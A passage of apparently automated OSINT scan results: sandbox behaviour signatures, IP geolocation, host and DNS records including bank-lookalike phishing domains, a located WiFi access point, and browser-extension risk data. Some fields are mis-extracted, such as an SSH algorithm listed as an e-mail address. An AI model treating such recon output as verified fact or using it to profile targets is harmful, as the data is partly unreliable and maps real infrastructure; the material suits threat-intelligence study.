text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W8PZ9GMH.txt]- [targetUID: 00000000-00003992]\n "CabBAEC.tmp" has type "data"- Location: [%TEMP%\\CabBAEC.tmp]- [targetUID: 00000000-00002780]\n "CabBACB.tmp" has type "data"- Location: [%TEMP%\\CabBACB.tmp]- [targetUID: 00000000-00002780]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "urlref_httpqueryfibre.github.iov4splice.css" has type "assembler source ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]'}, 
{u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'HTTPS traffic to "142.250.191.74" on port "443"\n HTTPS traffic to "185.199.108.153" on port "443" |
| 2023-05-12 02:45:53 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:52'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3037::6815:470e', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3037::6815:470e |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/ayhu | ayhu |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:53:55 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 24, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://zeptojs.com/zepto.min.js', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6140:120:WilError_01"\n "Local\\SM0:4356:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:4356:120:WilError_01"\n "Local\\SM0:4356:120:WilError_01"\n "SM0:6140:120:WilError_01"\n "Local\\SM0:6140:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:6140:304:WilStaging_02"\n "Local\\SM0:6140:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6140:304:WilStaging_02"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6140:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""baysidebuddy.com"," (Indicator: "ebuddy.com")\n ""comeherebuddy.com"," (Indicator: "ebuddy.com")\n ""www.facebook.com"," (Indicator: "facebook.com")\n ""linkedin.com"," (Indicator: "linkedin.com")\n ""paypal.com"," (Indicator: "paypal")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n 
""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""blingbykey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""boosted-luckey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bowlingmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""burgeonbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""busybeescrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\MICROSOFT EDGE.LNK"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': 
u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00006140]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.32\\Ruleset Data]- [targetUID: 00000000-00006140]\n "wallet-stable.json" has type "ASCII text"- Location: [%TEMP%\\6140_130057699\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00006140]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00006140]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00006140]\n "Filtering Rules" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\Filtering Rules]- [targetUID: 00000000-00006140]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\6140_130057699\\wallet.bundle.js]- [targetUID: 00000000-00006140]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\6140_130057699\\vendor.bundle.js]- [targetUID: 00000000-00006140]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006140]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: 
[%TEMP%\\6140_130057699\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00006140]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006140]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\product_page.js]- [targetUID: 00000000-00006140]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006140]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\auto_open_controller.js]- [targetUID: 00000000-00006140]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6140_130057699\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00006140]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\6140_130057699\\Notification\\notification.bundle.js]- [targetUID: 00000000-00006140]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Platform Notifications\\000003.log]- [targetUID: 00000000-00006140]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6140_1928901235\\Filtering Rules-AA]- [targetUID: 00000000-00006140]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006140]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\shoppingfre.js]- [targetUID: 00000000-00006140]'}, {u'category': 
u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-50', u'name': u'Creates a license file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"wallet-drawer.bundle.js.LICENSE.txt" has type "Unk | 185.199.109.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | mariposa (Net ID: 00:01:24:F1:B8:36) | 37.7642, -122.3993 |
| 2023-05-12 02:44:50 | Raw Data from RIRs | No | CRXcavator | 1 | 0 | 1 | 0 | None | [{"platform": "Chrome", "version": "2.1", "data": {"entrypoints": {"window.addEventListener": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jstorage.min.js": [14, 15]}, "chrome.tabs.query": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [59, 82], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/popup.js": [13], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [34, 49]}, "chrome.runtime.onMessage": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/content.js": [367], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [4], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [21]}}, "risk": {"webstore": {"website": 1, "last_updated": 2, "users": 1, "address": 1, "total": 7, "support_site": 1, "rating_users": 1}, "retire": {"total": 110, "medium": 100, "low": 10}, "permissions": {"total": 30}, "total": 524, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "metadata": {}}, "extcalls": ["https://s.click.aliexpress.com/deep_link.htm?aff_short_key=_DClxvSL&dl_target_url=", "https://www.ebay.", "http://www.dropshipping-ebay.com", "https://", "https://www.google.com/analytics/web/inpage/pub/inpage.js?", "https://ssl.google-analytics.com/j/__utm.gif", "http://www.google-analytics.com", "https://www.google.%/ads/ga-audiences?", "http://www.google.com/"], "retire": [{"results": [{"detection": "filename", "vulnerabilities": [{"info": ["https://github.com/jquery/jquery/issues/2432", "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "2432", "summary": "3rd party CORS request may execute"}, "severity": "medium"}, {"info": ["https://bugs.jquery.com/ticket/11974", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": 
{"CVE": ["CVE-2015-9251"], "issue": "11974", "summary": "parseHTML() executes scripts in event handlers"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11358", "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"], "identifiers": {"CVE": ["CVE-2019-11358"], "summary": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11022"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11023"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://github.com/jquery/jquery.com/issues/162"], "identifiers": {"summary": "jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates"}, "severity": "low"}], "version": "2.2.4.min", "component": "jquery"}], "file": "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jquery-2.2.4.min.js"}], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "ohfgljdgelakfkefopgklcohadegdpjf": {"rating": 4.65096, "users": 3000000, "platform": "", "short_description": "Easy-to-use PDF tools to Edit, Convert, Merge, Split and Compress PDF files.", "icon": 
"https://lh3.googleusercontent.com/JeGWeZiGxLb3KWGAn6FWnAjCyJDsmC7lu_O_x-h8TpDGQRa_VBnOhh-Uxh_XocOgczrfiPO_hzR_MDCleFQJeyiMwg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2865, "name": "Smallpdf - Edit, Compress and Convert PDF"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 911, "name": "Zoom Scheduler"}, "icnekagcncdgpdnpoecofjinkplbnocm": {"rating": 4.4411764, "users": 2000000, "platform": "", "short_description": "Read articles without distractions - use reader view. Make your reading process exceptional.", "icon": "https://lh3.googleusercontent.com/YBio0Hy33x3naSYfOCJBEMCntZexQLygzl17tRtLkxQXhR6esY8BtGoe7tgYNDmg3ZYAC2iTrQBdY-NVWXivPsn6r5A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34, "name": "Easyview Reader view"}, "fejgiddmdpgdmhhdjbophmflidmdpgdi": {"rating": 4.3333335, "users": 2000000, "platform": "", "short_description": "Increase audio volume up to 600% from the maximum! Boost your sound", "icon": "https://lh3.googleusercontent.com/0LHATIT-6LW9AX2Yy9uzoPDenL7TkUN-C_nsXHx9fODi7cQCp97p20zVArwcsk4UcocYknKLTd5Wyr6y4iW1q5T3hWE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Volume Booster Plus"}, "efaidnbmnnnibpcajpcglclefindmkaj": {"rating": 4.290437, "users": 10000000, "platform": "", "short_description": "Do more in Google Chrome with Adobe Acrobat PDF tools. 
View, fill, comment, sign, and try convert and compress tools.", "icon": "https://lh3.googleusercontent.com/aqahGz3euXadmtmp8NZnuKPoUm4cmewNY0AI1a_cMsC28cfvB2Bx3NArY9Mi50o2zF45Uh74Rmmq-Bh6dJRsVAbm=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34937, "name": "Adobe Acrobat: PDF edit, convert, sign tools"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "bpconcjcammlapcogcnnelfmaeghhagj": {"rating": 4.6261697, "users": 1000000, "platform": "", "short_description": "Record screencasts - record video from your screen. Screen Capture FULL Web page or any part. Edit screenshots.", "icon": "https://lh3.googleusercontent.com/VOnmhiXEBw4cIinxoJYNVSdqWr-xOchHol4frxQCitlE2mmsh1TByQ2zYNDv8sdyEP0lNrmwY4_FOi64MV1WQCnRS6U=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 16882, "name": "Nimbus Screenshot & Screen Video Recorder"}, "admmjipmmciaobhojoghlmleefbicajg": {"rating": 3.0946643, "users": 4000000, "platform": "", "short_description": "A cloud-based password manager that makes it easy to log in to your favorite sites.", "icon": "https://lh3.googleusercontent.com/uJX-GTxk93n7vQYuG55g9ULQFUknftFjN3ZAjbObhTQ3DIQlDHrcVfgfw7sLBpvSQDSl_Kv10WqpB1HvNUg9nWF_YQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1162, "name": "Norton Password Manager"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": 
"https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "bkkbcggnhapdmkeljlodobbkopceiche": {"rating": 4.7756734, "users": 2000000, "platform": "", "short_description": "Block popups, ads, cookie requests, trackers, notifications, ads on social media & more. A clean browsing experience starts today.", "icon": "https://lh3.googleusercontent.com/R9P6olNFUIkjebO_S6vG-1SulDiFYNVgtI8U-r3rm9Gq6TI__wd5ZIdeMxEB_9jL01MmRJve7CI28HLY18dJUOFibJs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 80784, "name": "Pop up blocker for Chrome\u2122 - Poper Blocker"}, "flliilndjeohchalpbbcdekjklbdgfkk": 